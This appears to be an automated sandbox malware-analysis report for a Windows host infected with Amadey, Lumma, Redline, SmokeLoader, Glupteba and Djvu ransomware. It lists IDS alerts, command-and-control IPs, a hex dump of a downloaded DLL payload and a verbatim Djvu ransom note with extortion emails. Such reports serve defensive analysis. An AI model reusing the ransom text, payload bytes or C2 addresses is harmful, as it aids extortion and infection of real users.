Timestamp:	192.168.2.579.137.192.1849808802027700 10/13/23-15:21:53.644769
SID:	2027700
Source Port:	49808
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849849802027700 10/13/23-15:22:09.578897
SID:	2027700
Source Port:	49849
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850036802027700 10/13/23-15:23:45.314916
SID:	2027700
Source Port:	50036
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849785802027700 10/13/23-15:21:40.784546
SID:	2027700
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] Win32/Lumma Stealer Check-In - Source IP: 192.168.2.5 - Destination IP: 172.67.144.245

Timestamp:	192.168.2.5172.67.144.24549828802048093 10/13/23-15:22:02.714048
SID:	2048093
Source Port:	49828
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850042802027700 10/13/23-15:23:49.853156
SID:	2027700
Source Port:	50042
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849963802027700 10/13/23-15:22:55.119437
SID:	2027700
Source Port:	49963
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC - Id1Response - Source IP: 51.255.152.132 - Destination IP: 192.168.2.5

Timestamp:	51.255.152.132192.168.2.536011497262043234 10/13/23-15:21:02.897594
SID:	2043234
Source Port:	36011
Destination Port:	49726
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849784802027700 10/13/23-15:21:39.931298
SID:	2027700
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850051802027700 10/13/23-15:23:56.656010
SID:	2027700
Source Port:	50051
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850066802027700 10/13/23-15:24:07.515838
SID:	2027700
Source Port:	50066
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849962802027700 10/13/23-15:22:54.200991
SID:	2027700
Source Port:	49962
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849971802027700 10/13/23-15:22:58.793498
SID:	2027700
Source Port:	49971
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849775802027700 10/13/23-15:21:32.167578
SID:	2027700
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849766802027700 10/13/23-15:21:24.775098
SID:	2027700
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849953802027700 10/13/23-15:22:48.609935
SID:	2027700
Source Port:	49953
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850023802027700 10/13/23-15:23:35.675502
SID:	2027700
Source Port:	50023
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850032802027700 10/13/23-15:23:42.542005
SID:	2027700
Source Port:	50032
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration - Source IP: 192.168.2.5 - Destination IP: 104.21.34.166

Timestamp:	192.168.2.5104.21.34.16649884802048094 10/13/23-15:22:26.047090
SID:	2048094
Source Port:	49884
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849906802027700 10/13/23-15:22:32.080233
SID:	2027700
Source Port:	49906
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850038802027700 10/13/23-15:23:46.224941
SID:	2027700
Source Port:	50038
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849794802027700 10/13/23-15:21:45.851178
SID:	2027700
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849883802027700 10/13/23-15:22:23.784277
SID:	2027700
Source Port:	49883
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849817802027700 10/13/23-15:21:58.889537
SID:	2027700
Source Port:	49817
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849990802027700 10/13/23-15:23:11.019958
SID:	2027700
Source Port:	49990
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850004802027700 10/13/23-15:23:21.818732
SID:	2027700
Source Port:	50004
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850039802027700 10/13/23-15:23:47.144611
SID:	2027700
Source Port:	50039
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849924802027700 10/13/23-15:22:37.840981
SID:	2027700
Source Port:	49924
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849959802027700 10/13/23-15:22:51.427732
SID:	2027700
Source Port:	49959
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850022802027700 10/13/23-15:23:34.799008
SID:	2027700
Source Port:	50022
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849969802027700 10/13/23-15:22:57.876412
SID:	2027700
Source Port:	49969
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849997802027700 10/13/23-15:23:16.309992
SID:	2027700
Source Port:	49997
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849978802027700 10/13/23-15:23:01.498683
SID:	2027700
Source Port:	49978
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850067802027700 10/13/23-15:24:08.408172
SID:	2027700
Source Port:	50067
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850000802027700 10/13/23-15:23:19.031144
SID:	2027700
Source Port:	50000
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850041802027700 10/13/23-15:23:48.928560
SID:	2027700
Source Port:	50041
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Potential Dridex.Maldoc Minimal Executable Request - Source IP: 192.168.2.5 - Destination IP: 14.33.209.147

Timestamp:	192.168.2.514.33.209.14749742802020826 10/13/23-15:21:15.445707
SID:	2020826
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN HTTP Executable Download from suspicious domain with direct request/fake browser (multiple families) - Source IP: 91.227.16.22 - Destination IP: 192.168.2.5

Timestamp:	91.227.16.22192.168.2.580498362018572 10/13/23-15:22:06.338085
SID:	2018572
Source Port:	80
Destination Port:	49836
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849797802027700 10/13/23-15:21:47.585414
SID:	2027700
Source Port:	49797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Filecoder.STOP Variant Public Key Download - Source IP: 14.33.209.147 - Destination IP: 192.168.2.5

Timestamp:	14.33.209.147192.168.2.580497352036335 10/13/23-15:21:09.616928
SID:	2036335
Source Port:	80
Destination Port:	49735
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849981802027700 10/13/23-15:23:03.363566
SID:	2027700
Source Port:	49981
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst - Source IP: 104.198.2.251 - Destination IP: 192.168.2.5

Timestamp:	104.198.2.251192.168.2.580497182037771 10/13/23-15:20:38.811453
SID:	2037771
Source Port:	80
Destination Port:	49718
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849921802027700 10/13/23-15:22:36.961647
SID:	2027700
Source Port:	49921
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849940802027700 10/13/23-15:22:43.193695
SID:	2027700
Source Port:	49940
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850007802027700 10/13/23-15:23:23.651568
SID:	2027700
Source Port:	50007
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Potential Dridex.Maldoc Minimal Executable Request - Source IP: 192.168.2.5 - Destination IP: 187.18.108.158

Timestamp:	192.168.2.5187.18.108.15849738802020826 10/13/23-15:21:09.695197
SID:	2020826
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849778802027700 10/13/23-15:21:34.751108
SID:	2027700
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850048802027700 10/13/23-15:23:53.544944
SID:	2027700
Source Port:	50048
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850060802027700 10/13/23-15:24:02.998074
SID:	2027700
Source Port:	50060
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850013802027700 10/13/23-15:23:28.422770
SID:	2027700
Source Port:	50013
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 13 Oct 2023 13:21:20 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf

Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 51.255.152.132
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.192.18

Source: 958B.exe, 00000018.00000003.2740356999.0000000009920000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 958B.exe, 00000018.00000003.2741345583.0000000009920000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
Source: 958B.exe, 00000018.00000003.2741583349.0000000009920000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eifuabdddkpqwuw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: onualituyrs.org

Source: unknown	HTTPS traffic detected: 91.215.85.209:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.6.54.58:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.130.41.106:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.196.133:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.185:443 -> 192.168.2.5:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.5:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.5:49756 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 0.2.file.exe.840e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.F3CC.exe.850000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.vusretg.770000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vusretg.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.F3CC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.F3CC.exe.730e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vusretg.760e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.850000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.2734778264.0000000000850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2123468725.0000000000850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2370688498.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2802667211.0000000000850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2056202136.0000000000850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2316367410.0000000000770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2370773420.0000000002121000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2123563075.0000000000881000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2802808021.0000000000881000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\958B.exe

Code function: 8_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,

8_2_004822E0

E-Banking Fraud

Yara detected Glupteba

Source: Yara match	File source: 40.3.2899.exe.5a80000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.2899.exe.5190e67.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.2899.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000028.00000003.2776648258.0000000005EC1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.4499808504.0000000000843000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.4506634971.00000000055D3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2899.exe PID: 4208, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Found ransom note / readme

Source: C:\_readme.txt

Dropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.You can get and look video overview decrypt tool:https://we.tl/t-xN3VuzQl0aPrice of private key and decrypt software is $980.Discount 50% available if you contact us first 72 hours, that's price for you is $490.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@freshmail.topReserve e-mail address to contact us:datarestorehelp@airmail.ccYour personal ID:0805JOsieH5GEqFET71y3XOoh3oKtw1e6KTqWYzciYNTqNfX5

Jump to dropped file

Yara detected Babuk Ransomware

Source: Yara match	File source: Process Memory Space: 958B.exe PID: 3848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 958B.exe PID: 3648, type: MEMORYSTR

Yara detected Djvu Ransomware

Source: Yara match	File source: 36.2.958B.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.958B.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.958B.exe.23215a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.958B.exe.23f15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.958B.exe.23a15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.958B.exe.23215a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.958B.exe.23d15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.958B.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.958B.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.958B.exe.23a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.958B.exe.23a15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.958B.exe.400000.0.unpack, type: UNPACKEDPE
